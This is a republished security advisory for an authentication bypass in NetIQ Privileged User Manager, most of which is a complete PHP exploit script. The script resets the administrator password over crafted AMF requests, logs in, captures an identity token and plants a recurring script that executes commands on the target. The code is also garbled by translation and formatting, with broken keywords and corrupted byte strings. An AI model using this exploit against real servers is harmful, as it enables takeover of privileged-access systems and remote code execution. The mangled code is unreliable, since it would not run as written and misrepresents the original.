NetIQ Privileged User Manager password change Authentication Bypass Vulnerability

Source: Internet
Author: User
Tags unpack perl script

Release date:
Updated on:

Affected Systems:
Netiq Privileged User Manager
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56535

NetIQ Privileged User Manager is a solution for secure access to UNIX, Linux, and Windows systems.

The NetIQ Privileged User Manager has the Identity Authentication Bypass Vulnerability. After successful exploitation, attackers can bypass security restrictions and change the administrator password.

<* Source: rgod (rgod@autistici.org)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php
/*
Novell NetIQ Privileged User Manager 2.3.1 auth. dll pa_modify_accounts ()
Remote Code Execution Exploit

Expected output:

C: \ php> php 9sg_novell_netiq_ I .php 192.168.0.1
[*] Attacking auth. dll...
[*] Modifying admin password...
[*] Done. Proceeding to next steps.
[*] Svc_name-> somename
[*] Logging in...
[*] Logged in: succeeded
[*] Identity Token-> Token + TIzEtMLsksS92h4MlWUlySmFvQ2rx3W34xd1Fqbn5JanxGfn
Bytes
65m57viBBllf1m0C680ZrLr0zaOSn7RrbfG/vt4TuXWd1p/5E/7lx3nj8ivnbbm133
T37cPgB9EJ8058WvT2rGdJK3fJ7SqmzBSR6J8yTYat7DaiRw + 8T2md + WGbW0gGAwM4Ap95pA =
[*] Setting up a rolover script which launches calc.exe
[*] Done. The following perl script will be launched in 5 seconds:
System ("calc.exe ");

C: \ php>

Rgod
*/
Error_reporting (E_ALL ^ E_NOTICE );
Set_time_limit (0 );
$ Err [0] = "[!] This script is intended to be launched from the cli! ";
$ Err [1] = "[!] You need the curl extesion loaded! ";
If (php_sapi_name () <> "cli "){
Die ($ err [0]);
}

Function syntax (){
Print ("usage: php 9sg_novell_netiq_ I .php [ip_address] \ r \ n ");
Die ();
}

$ Argv [1]? Print ("[*] Attacking auth. dll... \ n "):
Syntax ();

If (! Extension_loaded ('curl ')){
$ Win = (strtoupper (substr (PHP_ OS, 0, 3) === 'win ')? True:
False;
If ($ win ){
! Dl ("php_curl.dll ")? Die ($ err [1]):
Print ("[*] curl loaded \ n ");
} Else {
! Dl ("php_curl.so ")? Die ($ err [1]):
Print ("[*] curl loaded \ n ");
}
}

Function _ s ($ url, $ is_post, $ ck, $ request ){
Global $ _ use_proxy, $ proxy_host, $ proxy_port;
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, $ url );
If ($ is_post ){
Curl_setopt ($ ch, CURLOPT_POST, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ request );
}
Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
Curl_setopt ($ ch, CURLOPT_HTTPHEADER, array (
"Cookie:". $ ck,
"Content-Type: application/x-amf", // do not touch this, important
"X-flash-version: 11, 4, 402,278"
));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9; ENUSMSCOM )");
Curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, false );
Curl_setopt ($ ch, CURLOPT_SSL_VERIFYHOST, false );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 15 );

If ($ _ use_proxy ){
Curl_setopt ($ ch, CURLOPT_PROXY, $ proxy_host. ":". $ proxy_port );
}
$ _ D = curl_exec ($ ch );
If (curl_errno ($ ch )){
// Die ("[!] ". Curl_error ($ ch)." \ n ");
} Else {
Curl_close ($ ch );
}
Return $ _ d;
}

/*********************************** Config *** *******************************/
$ Host = $ argv [1];
$ Port = 443;
$ Pwd = "rgod_777 _"; // by default minimum length = 8, minimum alpha = 1, minimum numeric = 1
$ Script = "system (\" calc.exe \");";
/*************************************** **************************************/

Function hex_dump ($ data, $ newline = "\ n "){
Static $ from = '';
Static $ to = '';
Static $ width = 16; static $ pad = '.';
If ($ from = ''){
For ($ I = 0; $ I <= 0xFF; $ I ++ ){
$ From. = chr ($ I );
$ To. = ($ I >= 0x20 & $ I <= 0x7E )? Chr ($ I): $ pad;
}
}
$ Hex = str_split (bin2hex ($ data), $ width * 2 );
$ Chars = str_split (strtr ($ data, $ from, $ to), $ width );
$ Offset = 0;
Foreach ($ hex as $ I =>$ line ){
Echo sprintf ('% 6x', $ offset ). ':'. implode ('', str_split ($ line, 2 )). '['. $ chars [$ I]. ']'. $ newline; $ offset + = $ width;
}
Sleep (1 );
}

Print ("[*] Modifying admin password... \ n ");


$ Data = "\ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x13 \ x53 \ x50 \ x46 \ x2e \ x55 \ x74 \ x69 \ x6c ". //........ SPF. util
"\ X2e \ x63 \ x61 \ x6c \ x6c \ x4d \ x61 \ x73 \ x74 \ x65 \ x72 \ x00 \ x04 \ x2f \ x32 \ x36 ". //. callMaster .. /26
"\ X32 \ x00 \ x00 \ x02 \ x98 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 \ x00 \ x06 \ x6d \ x65 \ x74 ". // 2 ............ met
"\ X68 \ x6f \ x64 \ x02 ".
"\ X00 \ x0e ".
"ModifyAccounts". // boom
"\ X00 \ x06 \ x6d ".
"\ X6f \ x64 \ x75 \ x6c \ x65 \ x02 \ x00 \ x04 \ x61 \ x75 \ x74 \ x68 \ x00 \ x04 \ x55 \ x73 ". // odule... auth .. us
"\ X65 \ x72 \ x03 \ x00 \ x04 \ x6e \ x61 \ x6d \ x65 \ x02 ".
"\ X00 \ x05 ".
"Admin ".
"\ X00 \ x09 \ x41 \ x43 \ x54 \ x5f \ x53 \ x55 \ x50 \ x45 \ x52 \ x03 \ x00 \ x05 \ x76 \ x61 ". //.. ACT_SUPER... va
"\ X6c \ x75 \ x65 \ x00 \ x3f \ xf0 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x06 \ x61 \ x63 ". // lue .?......... Ac
"\ X74 \ x69 \ x6f \ x6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x0b \ x41 ". // tion... set ..... A
"\ X43 \ x54 \ x5f \ x43 \ x4f \ x4d \ x4d \ x45 \ x4e \ x54 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c ". // CT_COMMENT... val
"\ X75 \ x65 \ x02 \ x00 \ x04 \ x61 \ x73 \ x64 \ x64 \ x00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f ". // ue... asdd .. actio
"\ X6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x0a \ x41 \ x43 \ x54 \ x5f ". // n... set ..... ACT _
"\ X50 \ x41 \ x53 \ x53 \ x57 \ x44 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c \ x75 \ x65 \ x02 ". // PASSWD... value ..
Pack ("n", strlen ($ pwd). // 16 bit, big endian
$ Pwd.
"\ X00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f ".
"\ X6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 \ x00 \ x00 \ x09 \ x00 \ x08 \ x41 \ x43 \ x54 \ x5f ". // n... set ..... ACT _
"\ X44 \ x45 \ x53 \ x43 \ x03 \ x00 \ x05 \ x76 \ x61 \ x6c \ x75 \ x65 \ x02 \ x00 \ x03 \ x73 ". // DESC... value... s
"\ X64 \ x73 \ x00 \ x06 \ x61 \ x63 \ x74 \ x69 \ x6f \ x6e \ x02 \ x00 \ x03 \ x73 \ x65 \ x74 ". // ds .. action... set
"\ X00 \ x00 \ x09 \ x00 \ x00 \ x09 \ x00 \ x03 \ x75 \ x69 \ x64 \ x06 \ x00 \ x00 \ x09 "; //........ uid ....
$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "_ SID _ = 1;", $ data );
// Print (hex_dump ($ out). "\ n ");
Print ("[*] Done. Proceeding to next steps. \ n ");
$ Tmp = explode ("svc", $ out); $ tmp = $ tmp [1]; $ len = unpack ("n", $ tmp [1]. $ tmp [2]);
$ Svc_name = "";
For ($ I = 0; $ I <$ len [1]; $ I ++ ){
$ Svc_name. = $ tmp [$ I + 3];
}
Echo "[*] svc_name->". $ svc_name. "\ n ";
Echo "[*] Logging in... \ n ";
$ Data =
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x15 \ x53 \ x50 \ x46 \ x2e \ x55 \ x74 \ x69 ". //......... SPF. uti
"\ X6c \ x2e \ x63 \ x61 \ x6c \ x6c \ x4d \ x6f \ x64 \ x75 \ x6c \ x65 \ x45 \ x78 \ x00 \ x02 ". // l. callModuleEx ..
"\ X2f \ x34 \ x00 \ x00 \ x00 \ x65 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 \ x00 \ x03 \ cross stone \ x6b ". /// 4... e ........ pk
"\ X74 \ x03 \ x00 \ x0b \ x43 \ x72 \ x65 \ x64 \ x65 \ x6e \ x74 \ x69 \ x61 \ x6c \ x73 \ x03 ". // t... credentials.
"\ X00 \ x04 \ x6e \ x61 \ x6d \ x65 \ x02 \ x00 \ x05 \ x61 \ x64 \ x6d \ x69 \ x6e \ x00 \ x06 ". //.. name... admin ..
"\ Cross 7 \ x61 \ x73 \ x73 \ x77 \ x64 \ x02 ".
Pack ("n", strlen ($ pwd )).
$ Pwd.
"\ X00 \ x00 \ x09 ".
"\ X00 \ x06 \ x6d \ x65 \ x74 \ x68 \ x6f \ x64 \ x02 \ x00 \ x05 \ x6c \ x6f \ x67 \ x69 \ x6e ". //.. method... login
"\ X00 \ x06 \ x6d \ x6f \ x64 \ x75 \ x6c \ x65 \ x02 \ x00 \ x04 \ x61 \ x75 \ x74 \ x68 \ x00 ". //.. module... auth.
"\ X03 \ x75 \ x69 \ x64 \ x06 \ x00 \ x00 \ x09 \ x00 \ x00 \ x09"; //. uid .......
$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "", $ data );
// Print (hex_dump ($ out). "\ n ");
If (strpos ($ out, "successfully \ x20authenticated ")){
Echo "[*] Logged in: succeeded \ n ";
} Else {
Die ("[!] Exploit failed ");
}
$ Tmp = explode ("Identity \ x03 \ 0 \ x07content \ x02", $ out );
$ Tmp = $ tmp [1];
$ Len = unpack ("n", $ tmp [0]. $ tmp [1]);
$ Identity = "";
For ($ I = 0; $ I <$ len [1]; $ I ++ ){
$ Identity. = $ tmp [$ I + 2];
}
Echo "[*] Identity Token->". $ identity. "\ n ";
Echo "[*] Setting up a rolover script which launches calc.exe \ n ";
$ Data =
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x01 ".
"\ X00 \ x14 ".
"SPF. Util. callModuleA ".
"\ X00 \ x04 ".
"/165 ".
"\ X00 \ x00 \ x02 \ x86 \ x0a \ x00 \ x00 \ x00 \ x01 \ x03 ".
"\ X00 \ x03 ".
"Pkt ".
"\ X03 ".
"\ X00 \ x06 ".
"Method ".
"\ X02 ".
"\ X00 \ x0c ".
"SetLogConfig ".
"\ X00 \ x06 ".
"Module ".
"\ X02 ".
"\ X00 \ x07 ".
"Regclnt ".
"\ X00 \ x03 ".
"Log ".
"\ X03 ".
"\ X00 \ x04 ".
"File ".
"\ X02 ".
"\ X00 \ x09 ".
"Mylog. log ".
"\ X00 \ x05 ".
"Level ".
"\ X02 ".
"\ X00 \ x05 ".
"Trace ".
"\ X00 \ x08 ".
"Max_size ".
"\ X00 \ x40 \ x24 \ x00 ".
"\ X00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x0b ".
"Min_log_lvl ".
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ".
"\ X00 \ x08 ".
"Rolover ".
"\ X02 ".
"\ X00 \ x02 ".
"S5". // repeat every 5 seconds, 1 hour = H1
"\ X00 \ x06 ".
"Script ".
"\ X03 ".
"\ X00 \ x07 ".
"Content ".
"\ X02 ".
Pack ("n", strlen ($ script) + 4 ).
$ Script.
"\ X0a \ x0a ".
"1 ;".
"\ X00 \ x00 \ x09 ".
"\ X00 \ x00 \ x09 ".
"\ X00 \ x03 ".
"Uid ".
"\ X02 ".
Pack ("n", strlen ($ identity )).
$ Identity.
"\ X00 \ x00 \ x09 ".
"\ X00 \ x08 ".
"Svc_name ".
"\ X02 ".
Pack ("n", strlen ($ svc_name )).
$ Svc_name.
"\ X00 \ x00 \ x09 ";

$ Url = "https: // $ host: $ port /";
$ Out = _ s ($ url, 1, "", $ data );
// Print (hex_dump ($ out). "\ n ");
Echo "[*] Done. The following perl script will be launched in 5 seconds: \ n". $ script. "\ n ";
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Netiq
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Https://www.netiq.com/products/

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.